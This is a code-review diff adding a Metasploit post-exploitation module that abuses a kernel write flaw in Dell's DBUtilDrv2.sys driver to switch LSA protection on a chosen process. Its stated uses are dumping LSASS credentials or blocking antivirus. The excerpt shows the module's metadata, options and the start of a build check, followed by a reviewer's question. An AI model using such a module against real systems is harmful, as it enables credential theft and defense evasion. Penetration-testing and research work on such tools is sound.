modules/post/windows/manage/dell_memory_protect.rb

```diff
@@ -0,0 +1,101 @@
+
+  include Msf::Exploit::Local::WindowsKernel
+  include Msf::Post::File
+  include Msf::Post::Windows::Priv
+  include Msf::Post::Windows::Process
+  include Msf::Post::Windows::ReflectiveDLLInjection
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Dell DBUtilDrv2.sys Memory Protection Modifier',
+        'Description' => %q{
+          The Dell DBUtilDrv2.sys drivers version 2.5 and 2.7 have a write-what-where condition
+          that allows an attacker to read and write arbitrary kernel-mode memory. This module
+          installs the provided driver, enables or disables LSA protection on the provided
+          PID, and then removes the driver. This would allow, for example, dumping LSASS memory
+          even when secureboot is enabled or preventing antivirus from accessing the memory of
+          a chosen PID.
+
+          The affected drivers are not distributed with Metasploit. You will truly need to
+          Bring Your Own (Dell) Driver.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'SentinelLabs', # Vulnerability discovery in original Dell driver (dbutil_2_3.sys)
+          'Kasif Dekel',  # (from SentinelLabs) blog with detailed analysis
+          'Red Cursor',   # Authors of PPLKiller
+          'Jacob Baines'  # first reference of incomplete patch, poc, & metasploit module
+        ],
+        'Platform' => 'win',
+        'SessionTypes' => [ 'meterpreter' ],
+        'References' => [
+          # TODO: R7 blog
+          [ 'URL', 'https://docs.microsoft.com/en-us/windows-server/security/credentials-protection-and-management/configuring-additional-lsa-protection'],
+          [ 'URL', 'https://itm4n.github.io/lsass-runasppl/'],
+          [ 'URL', 'https://labs.sentinelone.com/cve-2021-21551-hundreds-of-millions-of-dell-computers-at-risk-due-to-multiple-bios-driver-privilege-escalation-flaws/' ],
+          [ 'URL', 'https://attackerkb.com/assessments/12d7b263-3684-4442-812e-dc30b93def93'],
+          [ 'URL', 'https://github.com/RedCursorSecurityConsulting/PPLKiller'],
+          [ 'URL', 'https://github.com/jbaines-r7/dellicious' ]
+        ],
+        'Notes' => {
+          'Reliability' => [ ],
+          'Stability' => [ CRASH_OS_RESTARTS ],
+          'SideEffects' => [ IOC_IN_LOGS, ARTIFACTS_ON_DISK ]
+        }
+      )
+    )
+    register_options([
+      OptString.new('DRIVER_PATH', [true, 'The path containing the driver inf, cat, and sys (and coinstaller)', '']),
+      OptString.new('PID', [true, 'The targetted process', '']),
+      OptBool.new('ENABLE_MEM_PROTECT', [true, 'Enable or disable memory protection', 'false'])
+    ])
+  end
+
+  def target_compatible?
+    sysinfo_value = sysinfo['OS']
+    build_num = sysinfo_value.match(/Build (\d+)/)[1].to_i
+    vprint_status("Windows Build Number = #{build_num}")
+
+    return true if sysinfo_value =~ /Windows 10/ && (build_num >= 10240 && build_num <= 22000)
```

Comment:
Will this work with the server targets? (This is a note for me to test on server targets, too)